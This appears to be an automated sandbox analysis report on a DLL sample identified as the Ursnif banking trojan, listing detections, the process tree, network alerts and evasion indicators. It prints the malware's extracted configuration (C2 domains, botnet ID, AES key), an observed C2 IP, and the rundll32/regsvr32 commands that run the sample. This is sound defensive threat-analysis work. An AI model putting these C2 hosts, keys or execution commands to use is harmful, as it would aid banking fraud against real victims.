Windows Analysis Report
pzG0rkIchr.dll

Overview

General Information

Sample Name:pzG0rkIchr.dll
Analysis ID:752975
MD5:d6ef4778f7dc9c31a0a2a989ef42d2fd
SHA1:5dad8394ef37d5a006674589754f7a3187d303b1
SHA256:54de1f2c26a63a8f6b7f8d5de99f8ebd4093959ab07f027db1985d0652258736
Tags:exe, LDR4

Detection

Ursnif
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Ursnif
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Performs DNS queries to domains with low reputation
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Tries to load missing DLLs
Checks if the current process is being debugged
Registers a DLL
Launches processes in debugging mode, may be used to hinder debugging
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 1556 cmdline: loaddll64.exe "C:\Users\user\Desktop\pzG0rkIchr.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)
    • conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1076 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 5268 cmdline: rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 2356 cmdline: regsvr32.exe /s C:\Users\user\Desktop\pzG0rkIchr.dll MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 5264 cmdline: rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6044 cmdline: rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,ItsnPq5v MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 5572 cmdline: C:\Windows\system32\WerFault.exe -u -p 6044 -s 276 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • rundll32.exe (PID: 6136 cmdline: rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,QlqYo259k MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 5404 cmdline: C:\Windows\system32\WerFault.exe -u -p 6136 -s 304 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
      • WerFault.exe (PID: 680 cmdline: C:\Windows\system32\WerFault.exe -u -p 6136 -s 304 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • cleanup
{"c2_domain": ["https://gigimas.xyz", "https://reaso.xyz"], "botnet": "202206061", "aes key": "eq2opFFpGzpd2p9t", "sleep time": "20", "request time": "30", "host keep time": "120", "host shift time": "120"}
Source | Rule | Description | Author | Strings
Process Memory Space: loaddll64.exe PID: 1556 | JoeSecurity_Ursnifv4 | Yara detected Ursnif | Joe Security |
Process Memory Space: regsvr32.exe PID: 2356 | JoeSecurity_Ursnifv4 | Yara detected Ursnif | Joe Security |
Process Memory Space: rundll32.exe PID: 5268 | JoeSecurity_Ursnifv4 | Yara detected Ursnif | Joe Security |
Process Memory Space: rundll32.exe PID: 5264 | JoeSecurity_Ursnifv4 | Yara detected Ursnif | Joe Security |
          No Sigma rule has matched
          Timestamp:11/24/22-05:22:35.810533 SID:2039645 Source:192.168.2.4:64906 Destination:8.8.8.8:53 Protocol:UDP Classtype:A Network Trojan was detected
          Timestamp:11/24/22-05:20:02.978332 SID:2039645 Source:192.168.2.4:61007 Destination:8.8.8.8:53 Protocol:UDP Classtype:A Network Trojan was detected
          Timestamp:11/24/22-05:21:04.451832 SID:2039645 Source:192.168.2.4:61124 Destination:8.8.8.8:53 Protocol:UDP Classtype:A Network Trojan was detected
          Timestamp:11/24/22-05:21:34.871041 SID:2039645 Source:192.168.2.4:59444 Destination:8.8.8.8:53 Protocol:UDP Classtype:A Network Trojan was detected
          Timestamp:11/24/22-05:22:05.359167 SID:2039645 Source:192.168.2.4:55570 Destination:8.8.8.8:53 Protocol:UDP Classtype:A Network Trojan was detected
          Timestamp:11/24/22-05:20:33.386749 SID:2039645 Source:192.168.2.4:60686 Destination:8.8.8.8:53 Protocol:UDP Classtype:A Network Trojan was detected
          Timestamp:11/24/22-05:23:06.390786 SID:2039645 Source:192.168.2.4:59446 Destination:8.8.8.8:53 Protocol:UDP Classtype:A Network Trojan was detected

          AV Detection

          Source: pzG0rkIchr.dll, Virustotal: Detection: 57%
          Source: pzG0rkIchr.dll, ReversingLabs: Detection: 73%
          Source: https://reaso.xyz, Avira URL Cloud: Label: malware
          Source: gigimas.xyz, Virustotal: Detection: 14%
          Source: https://gigimas.xyz, Virustotal: Detection: 11%
          Source: 4.3.rundll32.exe.17b359400d0.0.raw.unpack, Malware Configuration Extractor: Ursnif {"c2_domain": ["https://gigimas.xyz", "https://reaso.xyz"], "botnet": "202206061", "aes key": "eq2opFFpGzpd2p9t", "sleep time": "20", "request time": "30", "host keep time": "120", "host shift time": "120"}
          Source: pzG0rkIchr.dll, Static PE information: certificate valid
          Source: pzG0rkIchr.dll, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: C:\Windows\System32\loaddll64.exe, Code function: 0_2_00007FFC130EFB70 FindFirstFileExA
          Source: C:\Windows\System32\regsvr32.exe, Code function: 3_2_00007FFC130EFB70 FindFirstFileExA
          Source: C:\Windows\System32\rundll32.exe, Code function: 8_2_00007FFC130EFB70 FindFirstFileExA

          Networking

          Source: C:\Windows\System32\regsvr32.exe, Network Connect: 185.250.148.35 443
          Source: C:\Windows\System32\regsvr32.exe, Domain query: gigimas.xyz
          Source: Traffic, Snort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:61007 -> 8.8.8.8:53
          Source: Traffic, Snort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:60686 -> 8.8.8.8:53
          Source: Traffic, Snort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:61124 -> 8.8.8.8:53
          Source: Traffic, Snort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:59444 -> 8.8.8.8:53
          Source: Traffic, Snort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:55570 -> 8.8.8.8:53
          Source: Traffic, Snort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:64906 -> 8.8.8.8:53
          Source: Traffic, Snort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:59446 -> 8.8.8.8:53
          Source: C:\Windows\System32\regsvr32.exe, DNS query: gigimas.xyz
          Source: Joe Sandbox View, ASN Name: FIRSTDC-ASRU
          Source: Joe Sandbox View, IP Address: 185.250.148.35
          Source: pzG0rkIchr.dll, String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: WerFault.exe, 0000000D.00000002.379355430.000001EA8F2E0000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: WerFault.exe, 0000000D.00000002.379355430.000001EA8F2E0000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: pzG0rkIchr.dll, String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
          Source: pzG0rkIchr.dll, String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
          Source: pzG0rkIchr.dll, String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
          Source: pzG0rkIchr.dll, String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
          Source: pzG0rkIchr.dll, String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
          Source: pzG0rkIchr.dll, String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
          Source: pzG0rkIchr.dll, String found in binary or memory: http://ocsp.comodoca.com0
          Source: pzG0rkIchr.dll, String found in binary or memory: http://ocsp.sectigo.com0
          Source: loaddll64.exe, 00000000.00000003.631018067.0000020164340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641761210.00000000021BD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641543041.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.357258070.0000017B374A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.357488590.00000201A4290000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://gigimas.xyz
          Source: regsvr32.exe, 00000003.00000003.466330233.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.595788178.0000000000815000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641484903.0000000000813000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596407001.0000000000813000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.466249755.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://gigimas.xyz/
          Source: regsvr32.exe, 00000003.00000003.466330233.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596506826.000000000078D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://gigimas.xyz/index.html
          Source: regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://gigimas.xyz/index.html5F
          Source: regsvr32.exe, 00000003.00000003.466312748.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://gigimas.xyz/index.html9Pu/Jl
          Source: regsvr32.exe, 00000003.00000002.641214444.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596466270.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531265696.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://gigimas.xyz/index.htmlT
          Source: regsvr32.exe, 00000003.00000002.641004710.0000000000785000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://gigimas.xyz/index.htmlm
          Source: regsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://gigimas.xyz:443/index.html
          Source: regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://gigimas.xyz:443/index.htmlY_
          Source: regsvr32.exe, 00000003.00000002.641761210.00000000021BD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://gigimas.xyzhttps://reaso.xyz
          Source: loaddll64.exe, 00000000.00000003.631032238.0000020164342000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641554871.00000000020E2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.357262173.0000017B374A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.357492545.00000201A4292000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://http://Mozilla/5.0
          Source: regsvr32.exe, 00000003.00000002.641761210.00000000021BD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641543041.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.357258070.0000017B374A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.357488590.00000201A4290000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://reaso.xyz
          Source: pzG0rkIchr.dll, String found in binary or memory: https://sectigo.com/CPS0
          Source: unknown, DNS traffic detected: queries for: gigimas.xyz

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          Source: Yara match, File source: Process Memory Space: loaddll64.exe PID: 1556, type: MEMORYSTR
          Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 2356, type: MEMORYSTR
          Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
          Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5264, type: MEMORYSTR

          E-Banking Fraud

          Source: Yara match, File source: Process Memory Space: loaddll64.exe PID: 1556, type: MEMORYSTR
          Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 2356, type: MEMORYSTR
          Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
          Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5264, type: MEMORYSTR
          Source: C:\Windows\System32\rundll32.exe, Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6044 -s 276
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130FB3703_2_00007FFC130FB370
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130FB9B03_2_00007FFC130FB9B0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130F1E143_2_00007FFC130F1E14
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E4C803_2_00007FFC130E4C80
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E90B03_2_00007FFC130E90B0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130EDCAC3_2_00007FFC130EDCAC
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E5CC03_2_00007FFC130E5CC0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130FF8F03_2_00007FFC130FF8F0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130F98F03_2_00007FFC130F98F0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130E15203_2_00007FFC130E1520
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130F8D503_2_00007FFC130F8D50
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC13100D703_2_00007FFC13100D70
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130EF9643_2_00007FFC130EF964
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E37E04_2_0000017B359E37E0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E34A44_2_0000017B359E34A4
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E3CD84_2_0000017B359E3CD8
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E7FD44_2_0000017B359E7FD4
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E31C04_2_0000017B359E31C0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E6DF04_2_0000017B359E6DF0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359EA9184_2_0000017B359EA918
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E56384_2_0000017B359E5638
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E204C4_2_0000017B359E204C
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E45404_2_0000017B359E4540
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000017B359E9D6C4_2_0000017B359E9D6C
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A37E05_2_00000201A29A37E0
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A9D6C5_2_00000201A29A9D6C
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A31C05_2_00000201A29A31C0
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A34A45_2_00000201A29A34A4
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A7FD45_2_00000201A29A7FD4
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A3CD85_2_00000201A29A3CD8
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A6DF05_2_00000201A29A6DF0
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29AA9185_2_00000201A29AA918
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A45405_2_00000201A29A4540
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A56385_2_00000201A29A5638
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000201A29A204C5_2_00000201A29A204C
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E9BA08_2_00007FFC130E9BA0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E83C08_2_00007FFC130E83C0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130F68088_2_00007FFC130F6808
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E68208_2_00007FFC130E6820
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E58408_2_00007FFC130E5840
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130FF2908_2_00007FFC130FF290
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E42A08_2_00007FFC130E42A0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E76E08_2_00007FFC130E76E0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E1B108_2_00007FFC130E1B10
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130FB3708_2_00007FFC130FB370
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130FB9B08_2_00007FFC130FB9B0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130F75E08_2_00007FFC130F75E0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130F1E148_2_00007FFC130F1E14
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E4C808_2_00007FFC130E4C80
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E90B08_2_00007FFC130E90B0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130EDCAC8_2_00007FFC130EDCAC
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E5CC08_2_00007FFC130E5CC0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130FF8F08_2_00007FFC130FF8F0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130F98F08_2_00007FFC130F98F0
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E15208_2_00007FFC130E1520
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130E6D508_2_00007FFC130E6D50
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130F8D508_2_00007FFC130F8D50
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC13100D708_2_00007FFC13100D70
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130EF9648_2_00007FFC130EF964
          Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00000201640CA0AC CreateFileW,NtQueryDirectoryFile
          Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073A0AC CreateFileW,NtQueryDirectoryFile
          Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000017B359EA0AC CreateFileW,NtQueryDirectoryFile
          Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000201A29AA0AC CreateFileW,NtQueryDirectoryFile
          Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
          Source: pzG0rkIchr.dll Virustotal: Detection: 57%
          Source: pzG0rkIchr.dll ReversingLabs: Detection: 73%
          Source: pzG0rkIchr.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\pzG0rkIchr.dll"
          Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
          Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pzG0rkIchr.dll
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
          Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,DllRegisterServer
          Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,ItsnPq5v
          Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,QlqYo259k
          Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6044 -s 276
          Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6136 -s 304
          Source: C:\Windows\System32\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC43.tmp
          Source: classification engine Classification label: mal92.troj.evad.winDLL@19/8@4/2
          Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6044
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_01
          Source: C:\Windows\System32\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\ManagerMui
          Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6136
          Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: pzG0rkIchr.dll Static PE information: Image base 0x180000000 > 0x60000000
          Source: pzG0rkIchr.dll Static PE information: certificate valid
          Source: pzG0rkIchr.dll Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: pzG0rkIchr.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00007FFC130FB9B0 LoadLibraryA,GetProcAddress

          Hooking and other Techniques for Hiding and Protection

          Source: Yara match File source: Process Memory Space: loaddll64.exe PID: 1556, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2356, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5264, type: MEMORYSTR
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\loaddll64.exe TID: 1568 Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\System32\regsvr32.exe TID: 2516 Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\regsvr32.exe TID: 2768 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\System32\regsvr32.exe Last function: Thread delayed
          Source: C:\Windows\System32\rundll32.exe API coverage: 3.7 %
          Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00007FFC130EFB70 FindFirstFileExA
          Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFC130EFB70 FindFirstFileExA
          Source: C:\Windows\System32\rundll32.exe Code function: 8_2_00007FFC130EFB70 FindFirstFileExA
          Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
          Source: C:\Windows\System32\loaddll64.exe API call chain: ExitProcess graph end node graph_0-10341
          Source: C:\Windows\System32\loaddll64.exe API call chain: ExitProcess graph end node graph_0-10597
          Source: C:\Windows\System32\loaddll64.exe API call chain: ExitProcess graph end node graph_0-10336
          Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
          Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node
          Source: WerFault.exe, 0000000D.00000003.376776710.000001EA8F378000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.376906678.000001EA8F37C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqCWW
          Source: regsvr32.exe, 00000003.00000002.641033491.000000000078E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596506826.000000000078D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
          Source: WerFault.exe, 0000000D.00000003.378482368.000001EA8F388000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000002.379511936.000001EA8F368000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
          Source: regsvr32.exe, 00000003.00000003.466330233.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.401143685.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000002.379494368.000001EA8F35C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.378323908.000001EA8F35C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: regsvr32.exe, 00000003.00000003.466330233.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.401143685.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWa[g6
          Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00007FFC130EBC0C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFC130EBC0C
          Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00007FFC130FB9B0 LoadLibraryA,GetProcAddress,0_2_00007FFC130FB9B0
          Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00007FFC130E2380 GetProcessHeap,HeapAlloc,CreateFileA,TryEnterCriticalSection,0_2_00007FFC130E2380
          Source: C:\Windows\System32\rundll32.exe Process queried: DebugPort
          Source: C:\Windows\System32\rundll32.exe Process queried: DebugPort
          Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6136 -s 304
          Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00007FFC130EBC0C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFC130EBC0C
